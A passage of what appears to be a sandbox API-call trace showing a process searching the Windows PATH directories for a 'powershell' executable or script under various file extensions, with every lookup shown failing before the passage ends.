	[0393.979] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.979] SetErrorMode (uMode=0x1) returned 0x1
	[0393.980] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.980] SetErrorMode (uMode=0x1) returned 0x1
	[0393.980] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.980] SetErrorMode (uMode=0x1) returned 0x1
	[0393.980] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.980] SetErrorMode (uMode=0x1) returned 0x1
	[0393.980] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.980] SetErrorMode (uMode=0x1) returned 0x1
	[0393.981] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.981] SetErrorMode (uMode=0x1) returned 0x1
	[0393.981] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.981] SetErrorMode (uMode=0x1) returned 0x1
	[0393.981] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.981] SetErrorMode (uMode=0x1) returned 0x1
	[0393.982] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.982] SetErrorMode (uMode=0x1) returned 0x1
	[0393.982] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.982] SetErrorMode (uMode=0x1) returned 0x1
	[0393.982] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.982] SetErrorMode (uMode=0x1) returned 0x1
	[0393.982] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.982] SetErrorMode (uMode=0x1) returned 0x1
	[0393.983] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.983] SetErrorMode (uMode=0x1) returned 0x1
	[0393.983] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.983] SetErrorMode (uMode=0x1) returned 0x1
	[0393.983] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.983] SetErrorMode (uMode=0x1) returned 0x1
	[0393.983] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.983] SetErrorMode (uMode=0x1) returned 0x1
	[0393.984] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.984] SetErrorMode (uMode=0x1) returned 0x1
	[0393.984] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.984] SetErrorMode (uMode=0x1) returned 0x1
	[0393.984] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.984] SetErrorMode (uMode=0x1) returned 0x1
	[0393.984] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.985] SetErrorMode (uMode=0x1) returned 0x1
	[0393.985] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.985] SetErrorMode (uMode=0x1) returned 0x1
	[0393.985] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.985] SetErrorMode (uMode=0x1) returned 0x1
	[0393.985] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.985] SetErrorMode (uMode=0x1) returned 0x1
	[0393.986] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.986] SetErrorMode (uMode=0x1) returned 0x1
	[0393.986] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.986] SetErrorMode (uMode=0x1) returned 0x1
	[0393.986] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0393.986] SetErrorMode (uMode=0x1) returned 0x1
	[0393.986] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.986] SetErrorMode (uMode=0x1) returned 0x1
	[0393.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.987] SetErrorMode (uMode=0x1) returned 0x1
	[0393.987] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.987] SetErrorMode (uMode=0x1) returned 0x1
	[0393.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.987] SetErrorMode (uMode=0x1) returned 0x1
	[0393.987] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.987] SetErrorMode (uMode=0x1) returned 0x1
	[0393.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.988] SetErrorMode (uMode=0x1) returned 0x1
	[0393.988] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.988] SetErrorMode (uMode=0x1) returned 0x1
	[0393.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.988] SetErrorMode (uMode=0x1) returned 0x1
	[0393.988] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.988] SetErrorMode (uMode=0x1) returned 0x1
	[0393.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.989] SetErrorMode (uMode=0x1) returned 0x1
	[0393.989] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.989] SetErrorMode (uMode=0x1) returned 0x1
	[0393.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.989] SetErrorMode (uMode=0x1) returned 0x1
	[0393.989] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.989] SetErrorMode (uMode=0x1) returned 0x1
	[0393.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.990] SetErrorMode (uMode=0x1) returned 0x1
	[0393.990] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.990] SetErrorMode (uMode=0x1) returned 0x1
	[0393.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.990] SetErrorMode (uMode=0x1) returned 0x1
	[0393.990] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.990] SetErrorMode (uMode=0x1) returned 0x1
	[0393.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.991] SetErrorMode (uMode=0x1) returned 0x1
	[0393.991] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.991] SetErrorMode (uMode=0x1) returned 0x1
	[0393.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.991] SetErrorMode (uMode=0x1) returned 0x1
	[0393.991] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.992] SetErrorMode (uMode=0x1) returned 0x1
	[0393.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.992] SetErrorMode (uMode=0x1) returned 0x1
	[0393.992] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.992] SetErrorMode (uMode=0x1) returned 0x1
	[0393.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.992] SetErrorMode (uMode=0x1) returned 0x1
	[0393.992] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.993] SetErrorMode (uMode=0x1) returned 0x1
	[0393.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.993] SetErrorMode (uMode=0x1) returned 0x1
	[0393.993] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.993] SetErrorMode (uMode=0x1) returned 0x1
	[0393.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.993] SetErrorMode (uMode=0x1) returned 0x1
	[0393.993] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.994] SetErrorMode (uMode=0x1) returned 0x1
	[0393.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0393.994] SetErrorMode (uMode=0x1) returned 0x1
	[0393.994] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.994] SetErrorMode (uMode=0x1) returned 0x1
	[0393.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0393.994] SetErrorMode (uMode=0x1) returned 0x1
	[0393.994] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7fdce0 | out: lpFindFileData=0x1c7fdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0393.995] SetErrorMode (uMode=0x1) returned 0x1
	[0393.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7fdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0393.995] SetErrorMode (uMode=0x1) returned 0x1
